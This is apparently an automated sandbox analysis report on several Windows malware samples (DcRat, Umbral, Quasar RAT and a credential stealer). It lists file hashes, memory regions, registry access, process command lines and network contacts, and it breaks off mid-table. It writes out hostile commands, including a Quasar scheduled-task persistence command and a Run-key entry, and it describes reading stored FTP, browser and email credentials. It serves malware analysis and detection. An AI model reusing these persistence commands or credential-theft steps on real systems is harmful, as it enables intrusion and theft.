memory/1668-2-0x0000000000230000-0x0000000000231000-memory.dmp
memory/1668-3-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp
memory/1668-4-0x0000000000250000-0x000000000025E000-memory.dmp
memory/1668-5-0x0000000000270000-0x000000000027E000-memory.dmp
memory/1668-7-0x00000000002B0000-0x00000000002CC000-memory.dmp
memory/1668-6-0x0000000000280000-0x0000000000288000-memory.dmp
memory/1668-12-0x0000000000830000-0x0000000000842000-memory.dmp
memory/1668-11-0x0000000000810000-0x0000000000818000-memory.dmp
memory/1668-10-0x00000000005E0000-0x00000000005F6000-memory.dmp
memory/1668-9-0x00000000005D0000-0x00000000005E0000-memory.dmp
memory/1668-8-0x0000000000290000-0x0000000000298000-memory.dmp
memory/1668-13-0x0000000000850000-0x000000000085C000-memory.dmp
memory/1668-15-0x0000000000840000-0x0000000000850000-memory.dmp
memory/1668-16-0x0000000000B00000-0x0000000000B0A000-memory.dmp
memory/1668-14-0x0000000000820000-0x0000000000828000-memory.dmp
memory/1668-17-0x0000000000C40000-0x0000000000C96000-memory.dmp
memory/1668-18-0x0000000000B10000-0x0000000000B1C000-memory.dmp
memory/1668-21-0x0000000000E90000-0x0000000000E98000-memory.dmp
memory/1668-20-0x0000000000BB0000-0x0000000000BBC000-memory.dmp
memory/1668-19-0x0000000000B20000-0x0000000000B28000-memory.dmp
memory/1668-23-0x0000000000EA0000-0x0000000000EB2000-memory.dmp
memory/1668-24-0x0000000000FD0000-0x0000000000FDC000-memory.dmp
memory/1668-25-0x0000000000FE0000-0x0000000000FEC000-memory.dmp
memory/1668-27-0x0000000001000000-0x000000000100C000-memory.dmp
memory/1668-28-0x0000000001010000-0x000000000101C000-memory.dmp
memory/1668-30-0x0000000001020000-0x000000000102C000-memory.dmp
memory/1668-32-0x0000000001050000-0x000000000105E000-memory.dmp
memory/1668-34-0x0000000001170000-0x000000000117E000-memory.dmp
memory/1668-38-0x000000001B9C0000-0x000000001B9CA000-memory.dmp
memory/1668-39-0x000000001B9D0000-0x000000001B9DC000-memory.dmp
memory/1668-37-0x000000001B9B0000-0x000000001B9B8000-memory.dmp
memory/1668-36-0x000000001B9A0000-0x000000001B9AC000-memory.dmp
memory/1668-35-0x000000001B990000-0x000000001B998000-memory.dmp
memory/1668-33-0x0000000001060000-0x0000000001068000-memory.dmp
memory/1668-31-0x0000000001040000-0x000000000104A000-memory.dmp
memory/1668-29-0x0000000001030000-0x0000000001038000-memory.dmp
memory/1668-26-0x0000000000FF0000-0x0000000000FF8000-memory.dmp
C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\services.exe
| MD5 | 5d8505501b7faa4c7e541b0a32467a58 |
| SHA1 | ed0b9de10c38774af49d9279e25a8958817f33a7 |
| SHA256 | 1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca |
| SHA512 | a1fb110b16700001f75d4f74d93746349b5e2e78d4a5dde84c00ffe4eeed914cf7a3702de507c9a287f6df54a4cc0a4010a6bc28e4b641e8d5dcf20db6a302d9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 86ac014efc43cf459d29b32a36b6e262 |
| SHA1 | 531463e31967c8920ab62e1125020575917f4f37 |
| SHA256 | 4665a90f57b333a2fbcd0a42ae6d272d67bd27377a729a0d5fcc8e93de318370 |
| SHA512 | e95a45afea7079487bf72592bc402bad28e97ad518d50d3501a0bff2c01e639f7b79ae7b909b657925e7e4dc4d59e5b5191060654c790873f69ddba43a60c19b |
memory/2188-97-0x000000001B110000-0x000000001B3F2000-memory.dmp
memory/1668-99-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp
memory/2188-98-0x0000000002560000-0x0000000002568000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\W2tbEWSDqo.bat
| MD5 | aa0b9e0f88381eda8d944665d6da46ea |
| SHA1 | d40b34a27fda89aac8b0ed4a84bd6aed977da5a3 |
| SHA256 | 39993992eed25b350785f8a40589b971dbef574b393c05fe223f72d88c7fc223 |
| SHA512 | db5bb7052d4ef0716927f2f24c80159e5865e157c6c2b0c9bfd73a51d442ab31f42831640a888c01461817f8eabeb638df06cd47b30d37276e9e45ce1c7a7722 |
memory/1668-73-0x000007FEF5EF3000-0x000007FEF5EF4000-memory.dmp
memory/2668-142-0x0000000000C20000-0x0000000000C32000-memory.dmp
memory/2668-143-0x000000001B640000-0x000000001B696000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2704-224-0x000000001B360000-0x000000001B642000-memory.dmp
memory/1040-245-0x0000000001ED0000-0x0000000001ED8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\q3rpLXaa8e.bat
| MD5 | 9cd659e78563f6a2e3146fe63bcf9221 |
| SHA1 | 2a190fa2a5255205a1af6133ca9a57685a34f5a7 |
| SHA256 | f1247a59e52c54d0688482543a6e6b45c42c592167117abf45eb4e4ef072077c |
| SHA512 | e6b965276cd80d8309586e143dd6b3b209f2d03bf6ad1e2730e4c031ddb03317c842327d2a743322fd83d29846d2c7b1dfdccb078b8be3986c82bdf4ff98b633 |
memory/1928-269-0x00000000012D0000-0x0000000001BC8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\608a7d24-9261-4483-abdc-de1817c1c715.vbs
| MD5 | 198591adace4d5382e49473dfc678fd1 |
| SHA1 | 60a4314573d45035af8b2c0bfcdbcc1c219d7b57 |
| SHA256 | 0cfcf719dd54316bdb5700ca203daacf7ececfdb99717ed5e860a7225e2e2307 |
| SHA512 | b61b3cd39654597919bec92aac95ff3209fc8a39407e5266db7f14e71bc19ebfe6f31ffe33b5f61a2dbab698f2d1a7afe19002d1938488733095bc150f238772 |
C:\Users\Admin\AppData\Local\Temp\6531a927-b2aa-4c94-8cf8-f037baacc273.vbs
| MD5 | 0b802e1cbfbdce7f7239ed80629f3332 |
| SHA1 | d479ca79ea96df2bf5d2548b7adf1646d60d0629 |
| SHA256 | 7b35dc94bfb6a9ec507ef3a742dc2b9ed60abf67a67632f4f27c7f6534a066ac |
| SHA512 | 6f38315ba5ffc67e35223cf673ab159681e68e5c310b33e418635459e3f73ad1c2b8c9b03b00134bca36240623c3ae50625284b83e7cc83d183e7f56dfe58fc2 |
C:\Users\Admin\AppData\Local\Temp\0d141fdb-af58-4a20-b467-6e47f0dad324.vbs
| MD5 | 3c55335b9cae1ab0ae39d030d1a16c90 |
| SHA1 | 1d0c433df4badae55cb9f988eeebec7e03bd11bc |
| SHA256 | d1e63386c78806d417c8ab0430b77b01c89848c92768cd9b3a080ebce16614c8 |
| SHA512 | 651473bf680bd1be903e099505697642f5f59d2bd0f9823dcc07a47ccbedc374b82ffd4166e693b0fc8dbd99d9b802693b5bd2d54c51d48ebbe5606d8acc2686 |
Analysis: behavioral24
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
150s
Max time network
133s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\app.exe" | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3540 set thread context of 216 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
| PID 3540 set thread context of 3012 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe
"C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
"C:\Users\Admin\AppData\Roaming\My.RawFile.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | smtp.yandex.com | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/1384-0-0x0000000074FF2000-0x0000000074FF3000-memory.dmp
memory/1384-1-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-2-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-5-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-6-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-18-0x0000000074FF2000-0x0000000074FF3000-memory.dmp
memory/1384-19-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-20-0x0000000074FF0000-0x00000000755A1000-memory.dmp
C:\Users\Admin\AppData\Roaming\app.exe
| MD5 | 2a36c9ca52118eb7a7364b577e156cd5 |
| SHA1 | 83f62a4a8643b9dfd89f6750a1b5e63a9d525b17 |
| SHA256 | 6fa17b9dbde9b2f03975a5b5f44d7d2d4153aed94bebbd2098939a3562dac901 |
| SHA512 | bfbea8459c5135b6b21a2dc5bd149b0f775e4d540f7868252beb4e344e9de6e9040cb791da04186d487d92ef45a890154f80e62ebd16ac828f81ac2f6071732a |
memory/3540-33-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/3540-32-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-31-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/3540-35-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/3540-34-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/2176-37-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/2176-38-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/2176-39-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/3540-40-0x0000000074FF0000-0x00000000755A1000-memory.dmp
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
| MD5 | 5a733ef0de5e31e2e4b4abb016c0f251 |
| SHA1 | 28644040a6deac35c20fa931b5d003a97293363e |
| SHA256 | a80c77ca694eca3f6629c54572aba811e64b61975c5db2ff38c8d662d12b1ce7 |
| SHA512 | 9d09ac6b6a560643cac08345ab6ef8578011b11be7d4821d7aa1b3d76f2801d30cb4d206a4ff9335f0ece5cfa2ec8258754b2481102eac3da064e5005f7ffba9 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\aspnet_compiler.exe.log
| MD5 | b3ac9d09e3a47d5fd00c37e075a70ecb |
| SHA1 | ad14e6d0e07b00bd10d77a06d68841b20675680b |
| SHA256 | 7a23c6e7ccd8811ecdf038d3a89d5c7d68ed37324bae2d4954125d9128fa9432 |
| SHA512 | 09b609ee1061205aa45b3c954efc6c1a03c8fd6b3011ff88cf2c060e19b1d7fd51ee0cb9d02a39310125f3a66aa0146261bdee3d804f472034df711bc942e316 |
memory/216-55-0x0000000000400000-0x0000000000410000-memory.dmp
memory/3540-61-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/2176-62-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/2176-63-0x0000000074FF0000-0x00000000755A1000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241023-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Umbral family
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2880 wrote to memory of 2652 | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | C:\Windows\System32\Wbem\wmic.exe |
| PID 2880 wrote to memory of 2652 | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | C:\Windows\System32\Wbem\wmic.exe |
| PID 2880 wrote to memory of 2652 | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | C:\Windows\System32\Wbem\wmic.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe
"C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
memory/2880-0-0x000007FEF5543000-0x000007FEF5544000-memory.dmp
memory/2880-1-0x0000000001190000-0x00000000011D0000-memory.dmp
memory/2880-2-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp
memory/2880-3-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
95s
Max time network
145s
Command Line
Signatures
DcRat
Dcrat family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe
"C:\Users\Admin\AppData\Local\Temp\1a4ae15ef300f51f70607edc1e8e62a3.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/2896-0-0x00007FFFAFF83000-0x00007FFFAFF85000-memory.dmp
memory/2896-1-0x0000000000230000-0x000000000043A000-memory.dmp
memory/2896-2-0x00007FFFAFF80000-0x00007FFFB0A41000-memory.dmp
memory/2896-4-0x000000001AEE0000-0x000000001AEEE000-memory.dmp
memory/2896-3-0x0000000000D00000-0x0000000000D0E000-memory.dmp
memory/2896-6-0x00007FFFAFF80000-0x00007FFFB0A41000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241023-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe
"C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
Network
| Country | Destination | Domain | Proto |
| N/A | 192.168.1.55:4782 | tcp | |
| N/A | 192.168.1.55:4782 | tcp | |
| N/A | 192.168.1.55:4782 | tcp | |
| N/A | 192.168.1.55:4782 | tcp | |
| N/A | 192.168.1.55:4782 | tcp | |
| N/A | 192.168.1.55:4782 | tcp | |
| N/A | 192.168.1.55:4782 | tcp |
Files
memory/2600-0-0x000007FEF53B3000-0x000007FEF53B4000-memory.dmp
memory/2600-1-0x0000000000B90000-0x0000000000EB4000-memory.dmp
memory/2600-2-0x000007FEF53B0000-0x000007FEF5D9C000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 35110eedb3518d1905b88025bf11b77d |
| SHA1 | c39e96cc0dcb14065984c3d3fbff331070e37feb |
| SHA256 | 1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd |
| SHA512 | 08a3db05d373eb18f9b86fcea5b4338bd4cf3ca60df9906873bc0eb4d2dd6bc544890d23543df9be0848647d89a14d51010a7498bf8041c6872d8af768e035d2 |
memory/3048-8-0x0000000000960000-0x0000000000C84000-memory.dmp
memory/3048-9-0x000007FEF53B0000-0x000007FEF5D9C000-memory.dmp
memory/3048-10-0x000007FEF53B0000-0x000007FEF5D9C000-memory.dmp
memory/2600-11-0x000007FEF53B0000-0x000007FEF5D9C000-memory.dmp
memory/3048-12-0x000007FEF53B0000-0x000007FEF5D9C000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
149s
Max time network
144s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Umbral family
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
